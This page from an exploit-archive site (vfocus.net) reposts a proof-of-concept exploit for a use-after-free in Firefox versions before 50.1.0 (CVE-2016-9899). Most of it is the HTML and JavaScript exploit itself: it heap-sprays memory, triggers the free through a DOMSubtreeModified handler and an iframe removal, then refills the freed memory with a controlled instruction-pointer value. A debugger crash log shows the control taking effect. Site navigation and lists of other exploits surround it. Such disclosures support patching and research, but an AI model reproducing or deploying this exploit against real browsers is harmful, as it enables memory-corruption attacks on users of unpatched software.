首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Firefox < 50.1.0 - Use After Free
来源:vfocus.net 作者:Ressel 发布时间:2017-01-16  
<!DOCTYPE html>
<html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script>
  <script type="text/javascript" language="JavaScript">
   
   /*
    * Mozilla Firefox < 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: < 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000> dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */
   var doc = null;
   var cnt = 0;
 
   function m(blocks,size) {
            var arr = [];
            for(var i=0;i<blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j<size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    }
      
    function handler() {    //free
             if(cnt > 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();     
             m(1024,1024);  
             ++cnt;
    }
 
    function trigger() {
             if(cnt  > 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);
                for(var i=0;i<4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip 
                    for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }
 
    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
         doc = document.getElementById("t1").contentWindow.document;
         doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);
         doc.getElementsByTagName("*")[0].style = "ANNNY";
         setInterval("trigger();",1000);  
 
    }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iTechscripts Freelancer Script
·SapLPD 7.4.0 Denial Of Service
·Cisco Firepower Management Con
·DiskBoss Enterprise GET Buffer
·Firejail - Privilege Escalatio
·Apple iTunes Notify Script Ins
·Cemu 1.6.4b - Information Leak
·PHP LibGD Heap Buffer Overflow
·Microsoft Windows 8.1 (x64) -
·WinaXe Plus 8.7 - Buffer Overf
·Microsoft Windows Kernel - 'wi
·iSelect v1.4 - Local Buffer Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved